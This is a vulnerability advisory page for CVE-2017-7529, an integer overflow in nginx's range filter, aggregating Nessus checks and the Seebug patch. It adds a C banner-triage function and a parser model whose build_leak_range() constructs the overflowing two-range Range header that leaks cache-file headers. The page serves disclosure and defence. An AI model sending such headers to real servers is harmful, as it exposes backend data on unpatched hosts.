CVE-2017-7529 - Integer Overflow or Wraparound vulnerability in multiple products
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: NONE
Availability impact: NONE
Summary
nginx 0.5.6 through 1.13.2 (inclusive) is vulnerable to an integer overflow in the range filter module (ngx_http_range_filter_module). A specially crafted request can trigger it, resulting in a leak of potentially sensitive information.
Common Weakness Enumeration (CWE)
- CWE-190: Integer Overflow or Wraparound
Common Attack Pattern Enumeration and Classification (CAPEC)
- Forced Integer Overflow: This attack forces an integer variable out of its range. The variable is often used as an offset, for example as the size of a memory allocation, and the attacker typically controls its value and pushes it out of range. For instance, when the integer is incremented past its maximum representable value it may wrap around to a very small or negative number, yielding an incorrect value that leads to unexpected behavior. At worst, the attacker can execute arbitrary code.
Nessus
- NASL family: Amazon Linux Local Security Checks
  NASL id: ALA_ALAS-2017-894.NASL
  description: A flaw within the processing of ranged HTTP requests has been discovered in the range filter module of nginx. A remote attacker could possibly exploit this flaw to disclose parts of the cache file header, or, if used in combination with third party modules, disclose potentially sensitive memory by sending specially crafted HTTP requests. (CVE-2017-7529)
  last seen: 2020-06-01, modified: 2020-06-02
  plugin id: 103228, published: 2017-09-15
  reporter: This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
  source: https://www.tenable.com/plugins/nessus/103228
  title: Amazon Linux AMI : nginx (ALAS-2017-894)
- NASL family: Fedora Local Security Checks
  NASL id: FEDORA_2017-AECD25B8A9.NASL
  description: This update includes nginx 1.12.1, fixing CVE-2017-7529, and adds the http_auth_request module. See http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html for more information on CVE-2017-7529. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
  last seen: 2020-06-05, modified: 2017-08-24
  plugin id: 102719, published: 2017-08-24
  reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/102719
  title: Fedora 26 : 1:nginx (2017-aecd25b8a9)
- NASL family: FreeBSD Local Security Checks
  NASL id: FREEBSD_PKG_B28ADC5B669311E7AD43F0DEF16C5C1B.NASL
  description: Maxim Dounin reports : A security issue was identified in nginx range filter. A specially crafted request might result in an integer overflow and incorrect processing of ranges, potentially resulting in sensitive information leak (CVE-2017-7529).
  last seen: 2020-06-01, modified: 2020-06-02
  plugin id: 101381, published: 2017-07-12
  reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/101381
  title: FreeBSD : nginx -- a specially crafted request might result in an integer overflow (b28adc5b-6693-11e7-ad43-f0def16c5c1b)
- NASL family: Debian Local Security Checks
  NASL id: DEBIAN_DLA-1024.NASL
  description: It was discovered that there was a vulnerability in the range filter of nginx, a web/proxy server. A specially crafted request might result in an integer overflow and incorrect processing of HTTP ranges, potentially resulting in a sensitive information leak. For Debian 7
  last seen: 2020-03-17, modified: 2017-07-14
  plugin id: 101535, published: 2017-07-14
  reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/101535
  title: Debian DLA-1024-1 : nginx security update
- NASL family: Web Servers
  NASL id: NGINX_1_13_3.NASL
  description: According to its Server response header, the installed version of nginx is prior to 1.12.1 or 1.13.x prior to 1.13.3. It is, therefore, affected by an integer overflow vulnerability in the range filter module. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose potentially sensitive information.
  last seen: 2020-05-09, modified: 2018-10-16
  plugin id: 118151, published: 2018-10-16
  reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/118151
  title: nginx Data Disclosure Vulnerability
- NASL family: Ubuntu Local Security Checks
  NASL id: UBUNTU_USN-3352-1.NASL
  description: It was discovered that an integer overflow existed in the range filter feature of nginx. A remote attacker could use this to expose sensitive information. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
  last seen: 2020-06-01, modified: 2020-06-02
  plugin id: 101546, published: 2017-07-14
  reporter: Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/101546
  title: Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : nginx vulnerability (USN-3352-1)
- NASL family: Fedora Local Security Checks
  NASL id: FEDORA_2017-C27A947AF1.NASL
  description: This update includes nginx 1.12.1, fixing CVE-2017-7529, and adds the http_auth_request module. See http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html for more information on CVE-2017-7529. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
  last seen: 2020-06-05, modified: 2017-08-24
  plugin id: 102720, published: 2017-08-24
  reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/102720
  title: Fedora 25 : 1:nginx (2017-c27a947af1)
- NASL family: Debian Local Security Checks
  NASL id: DEBIAN_DSA-3908.NASL
  description: An integer overflow has been found in the HTTP range module of Nginx, a high-performance web and reverse proxy server, which may result in information disclosure.
  last seen: 2020-06-01, modified: 2020-06-02
  plugin id: 101490, published: 2017-07-13
  reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/101490
  title: Debian DSA-3908-1 : nginx - security update
- NASL family: SuSE Local Security Checks
  NASL id: OPENSUSE-2018-316.NASL
  description: This update for nginx to version 1.13.9 fixes the following issues : - CVE-2017-7529: nginx: Integer overflow in nginx range filter module allowed memory disclosure (bsc#1048265) This update also contains all updates and improvements in the 1.13.9 upstream release.
  last seen: 2020-06-05, modified: 2018-03-27
  plugin id: 108639, published: 2018-03-27
  reporter: This script is Copyright (C) 2018-2020 Tenable Network Security, Inc.
  source: https://www.tenable.com/plugins/nessus/108639
  title: openSUSE Security Update : nginx (openSUSE-2018-316)
- NASL family: Web Servers
  NASL id: NGINX_1_13_2.NASL
  description: According to the self-reported version in its response header, the version of nginx hosted on the remote web server is < 1.13.2. It is, therefore, affected by an integer overflow vulnerability
  last seen: 2020-05-01, modified: 2020-05-02
  plugin id: 105359, published: 2017-12-18
  reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
  source: https://www.tenable.com/plugins/nessus/105359
  title: nginx < 1.13.2 Integer Overflow Vulnerability
- NASL family: PhotonOS Local Security Checks
  NASL id: PHOTONOS_PHSA-2017-0038.NASL
  description: An update of [gnutls, c-ares, nginx, mercurial, linux, mesos, git, binutils, krb5, dnsmasq] packages for PhotonOS has been released.
  last seen: 2019-02-21, modified: 2019-02-07
  plugin id: 111887, published: 2018-08-17
  reporter: Tenable
  source: https://www.tenable.com/plugins/index.php?view=single&id=111887
  title: Photon OS 1.0: Binutils / C / Dnsmasq / Git / Gnutls / Krb5 / Linux / Mercurial / Mesos / Nginx PHSA-2017-0038 (deprecated)
- NASL family: SuSE Local Security Checks
  NASL id: OPENSUSE-2017-867.NASL
  description: This update for nginx fixes the following issues : - CVE-2017-7529: A remote attacker could have used specially crafted requests to trigger an integer overflow in the nginx range filter module to leak potentially sensitive information (boo#1048265)
  last seen: 2020-06-05, modified: 2017-07-31
  plugin id: 102057, published: 2017-07-31
  reporter: This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.
  source: https://www.tenable.com/plugins/nessus/102057
  title: openSUSE Security Update : nginx (openSUSE-2017-867)
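The two remote checks above (plugins 105359 and 118151) draw the boundary differently, and the difference matters: 1.12.1 carries the fix on the stable branch while 1.13.0 through 1.13.2 on mainline do not, so a plain "less than 1.13.3" comparison misclassifies fixed 1.12.x servers. The following is an added example, not Tenable's plugin code, that encodes the advisory's affected range as a triage function over a Server header value; the names parse_server_header and cve_2017_7529_status and the sample banners are this example's own constructions.

```c
/* Added example, not Tenable's plugin code: classify a Server header against
 * the advisory's affected range for CVE-2017-7529. The affected set is not a
 * single "< 1.13.3" interval: 1.12.1 is the fix on the stable branch, so
 * 1.12.1 and later 1.12.x are clean while 1.13.0 through 1.13.2 are still hit. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

typedef struct { int major, minor, patch; } nginx_ver;

/* Accepts "nginx/1.13.2" or a bare "1.13.2". With `server_tokens off` the
 * banner is just "nginx" and no version can be recovered from it. */
static bool parse_server_header(const char *hdr, nginx_ver *v)
{
    const char *p = strstr(hdr, "nginx/");
    p = p ? p + 6 : hdr;
    return sscanf(p, "%d.%d.%d", &v->major, &v->minor, &v->patch) == 3;
}

static int vcmp(nginx_ver a, nginx_ver b)
{
    if (a.major != b.major) return a.major < b.major ? -1 : 1;
    if (a.minor != b.minor) return a.minor < b.minor ? -1 : 1;
    if (a.patch != b.patch) return a.patch < b.patch ? -1 : 1;
    return 0;
}

/* 1 = affected per the advisory, 0 = outside the affected range, -1 = no
 * usable version in the banner (verify by other means, e.g. package version). */
int cve_2017_7529_status(const char *server_header)
{
    const nginx_ver first = {0, 5, 6}, stable_fix = {1, 12, 1};
    const nginx_ver mainline_first = {1, 13, 0}, mainline_fix = {1, 13, 3};
    nginx_ver v;

    if (!parse_server_header(server_header, &v)) return -1;
    if (vcmp(v, first) < 0) return 0;            /* before 0.5.6 */
    if (vcmp(v, stable_fix) < 0) return 1;       /* 0.5.6 .. 1.12.0 */
    if (vcmp(v, mainline_first) < 0) return 0;   /* 1.12.1 .. 1.12.x: fixed */
    if (vcmp(v, mainline_fix) < 0) return 1;     /* 1.13.0 .. 1.13.2 */
    return 0;                                    /* 1.13.3 and later */
}

int main(void)
{
    /* constructed banners, not captured from a real host */
    const char *banners[] = {"nginx/1.12.0", "nginx/1.12.1", "nginx/1.13.2", "nginx/1.13.3", "nginx"};
    for (size_t i = 0; i < sizeof banners / sizeof banners[0]; i++)
        printf("%-14s -> %d\n", banners[i], cve_2017_7529_status(banners[i]));
    return 0;
}
```

A banner check is only a first pass: the distribution advisories listed on this page (Debian, Ubuntu, Fedora, openSUSE, Amazon Linux, FreeBSD) ship backported fixes under the old upstream version string, which is why the local security check plugins compare package versions rather than the Server header. Treat a result of 1 from the banner as "confirm against the package manager", not as a finding.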
Seebug
bulletinFamily | exploit |
description | A security issue was identified in nginx range filter. A specially crafted request might result in an integer overflow and incorrect processing of ranges, potentially resulting in sensitive information leak (CVE-2017-7529). When using nginx with standard modules this allows an attacker to obtain a cache file header if a response was returned from cache. In some configurations a cache file header may contain IP address of the backend server or other sensitive information. Besides, with 3rd party modules it is potentially possible that the issue may lead to a denial of service or a disclosure of a worker process memory. No such modules are currently known though. The issue affects nginx 0.5.6 - 1.13.2. The issue is fixed in nginx 1.13.3, 1.12.1. For older versions, the following configuration can be used as a temporary workaround: ``` max_ranges 1; ``` **patch** ``` diffsrc/http/modules/ngx_http_range_filter_module.c b/src/http/modules/ngx_http_range_filter_module.c --- src/http/modules/ngx_http_range_filter_module.c +++ src/http/modules/ngx_http_range_filter_module.c @@ -377,6 +377,10 @@ ngx_http_range_parse(ngx_http_request_t range->start = start; range->end = end; + if (size > NGX_MAX_OFF_T_VALUE - (end - start)) { + return NGX_HTTP_RANGE_NOT_SATISFIABLE; + } + size += end - start; if (ranges-- == 0) { ``` |
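Review bot: the new guard in ngx_http_range_parse() is only correct if `end - start` is non-negative and itself fits in off_t, since otherwise `NGX_MAX_OFF_T_VALUE - (end - start)` is the expression that misbehaves; the hunk's context shows `range->start`/`range->end` being stored but not where `start < end` is established, so a one-line comment above the `if` stating that invariant (or placing the check under the same condition that admits the range) would make the check reviewable in isolation. A short note on why the overflow case is answered with NGX_HTTP_RANGE_NOT_SATISFIABLE rather than the outcome of the `ranges-- == 0` limit immediately below would also help readers comparing the two limits.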
id | SSV:96273 |
last seen | 2017-11-19 |
modified | 2017-07-13 |
published | 2017-07-13 |
title | Nginx Remote Integer Overflow Vulnerability(CVE-2017-7529 ) |
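To see why a second range is needed, how it slips a negative start past the filter's size check, and why both the patch and the `max_ranges 1` workaround close the hole, the following added example models the parser's arithmetic in C. It is not nginx source: the function names, return codes, the syntax handling, the 1000-byte body and the 623-byte reach in front of it are this example's own constructions, and the wraparound is made explicit with unsigned arithmetic because signed overflow is undefined in C.

```c
/* Added example, not nginx source: a model of the range arithmetic in
 * ngx_http_range_parse() that CVE-2017-7529 abuses. It keeps what the advisory
 * patch touches (per-range bounds, the running `size` total, the post-loop size
 * guard, the `max_ranges` counter, the new overflow check); return codes and
 * syntax handling are this model's simplification. */
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NGX_MAX_OFF_T_VALUE INT64_MAX   /* 64-bit off_t, as on LP64 builds */
enum { RANGE_OK = 0, RANGE_DECLINED = 1, RANGE_NOT_SATISFIABLE = 2 };
typedef struct { int64_t start, end; } range_t;   /* half-open [start, end) */

/* Two's-complement wrap. Signed overflow is undefined in C; the unpatched code
 * got whatever the compiler emitted, which on affected builds was this wrap. */
static int64_t wrap_add(int64_t a, int64_t b) { return (int64_t)((uint64_t)a + (uint64_t)b); }

/* Decimal off_t with an nginx-style cutoff: one number cannot exceed off_t, so
 * the overflow has to come from summing several ranges. */
static bool parse_off(const char **pp, int64_t *out)
{
    const char *p = *pp;
    int64_t v = 0, cutoff = NGX_MAX_OFF_T_VALUE / 10, cutlim = NGX_MAX_OFF_T_VALUE % 10;
    if (*p < '0' || *p > '9') return false;
    for (; *p >= '0' && *p <= '9'; p++) {
        int d = *p - '0';
        if (v > cutoff || (v == cutoff && d > cutlim)) return false;
        v = v * 10 + d;
    }
    *pp = p; *out = v;
    return true;
}

/* Parses "bytes=..." for a body of content_length bytes. `patched` turns on the
 * advisory's check; `max_ranges` is the directive used as the workaround. */
int parse_ranges(const char *hdr, int64_t content_length, int64_t max_ranges,
                 bool patched, range_t *out, size_t cap, size_t *nout)
{
    const char *p = hdr + 6;
    int64_t size = 0, start, end;
    size_t n = 0;
    if (strncmp(hdr, "bytes=", 6) != 0) return RANGE_DECLINED;
    for (;;) {
        if (*p == '-') {                         /* suffix "-N": last N bytes */
            p++;
            if (!parse_off(&p, &end)) return RANGE_NOT_SATISFIABLE;
            start = content_length - end;        /* negative when N > content_length */
            end = content_length;
        } else {                                 /* "first-last" or "first-" */
            if (!parse_off(&p, &start) || *p++ != '-') return RANGE_NOT_SATISFIABLE;
            if (*p == ',' || *p == '\0') {
                end = content_length;
            } else {
                if (!parse_off(&p, &end)) return RANGE_NOT_SATISFIABLE;
                end = (end >= content_length) ? content_length : end + 1;
            }
        }
        if (start < end) {
            if (n == cap) return RANGE_DECLINED;
            out[n].start = start; out[n++].end = end;
            /* the patch: refuse before `size` can wrap */
            if (patched && size > NGX_MAX_OFF_T_VALUE - (end - start)) return RANGE_NOT_SATISFIABLE;
            size = wrap_add(size, end - start);
            if (max_ranges-- == 0) return RANGE_DECLINED;   /* `max_ranges 1` stops here */
        }
        if (*p == '\0') break;
        if (*p++ != ',') return RANGE_NOT_SATISFIABLE;
    }
    if (n == 0) return RANGE_NOT_SATISFIABLE;
    if (size > content_length) return RANGE_DECLINED;   /* the guard a wrapped size slips past */
    *nout = n;
    return RANGE_OK;
}

/* Header that defeats the guard: two suffix ranges whose lengths sum to exactly
 * 2^63. The first reaches `reach_back` bytes in front of the body, where the
 * advisory says the cache file header sits; the distance is an assumption of
 * this model, not a measured nginx value. */
void build_leak_range(int64_t content_length, int64_t reach_back, char *buf, size_t cap)
{
    uint64_t first = (uint64_t)(content_length + reach_back);
    snprintf(buf, cap, "bytes=-%" PRIu64 ",-%" PRIu64, first, ((uint64_t)1 << 63) - first);
}

int main(void)
{
    range_t r[4]; size_t n; char hdr[96];
    build_leak_range(1000, 623, hdr, sizeof hdr);   /* constructed: a 1000-byte cached body */
    printf("%s\n", hdr);
    if (parse_ranges(hdr, 1000, INT64_MAX, false, r, 4, &n) == RANGE_OK)
        printf("unpatched: accepted, first range starts at %" PRId64 "\n", r[0].start);
    printf("patched: %d, max_ranges 1: %d\n", parse_ranges(hdr, 1000, INT64_MAX, true, r, 4, &n),
           parse_ranges(hdr, 1000, 1, false, r, 4, &n));
    return 0;
}
```

On its own, a suffix range longer than the body gives a negative start but is thrown out because the total exceeds content_length. Adding a second suffix range whose length brings the total to exactly 2^63 wraps `size` to INT64_MIN, the `size > content_length` comparison passes, and the first range's negative start survives into the response: that is the cache file header leak. The patch rejects the request the moment the next addition would exceed NGX_MAX_OFF_T_VALUE, and `max_ranges 1` works because the wrap needs at least two ranges to accumulate.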
References
- http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html
- http://www.securityfocus.com/bid/99534
- http://www.securitytracker.com/id/1039238
- https://puppet.com/security/cve/cve-2017-7529
- https://access.redhat.com/errata/RHSA-2017:2538
- https://support.apple.com/kb/HT212818
- http://seclists.org/fulldisclosure/2021/Sep/36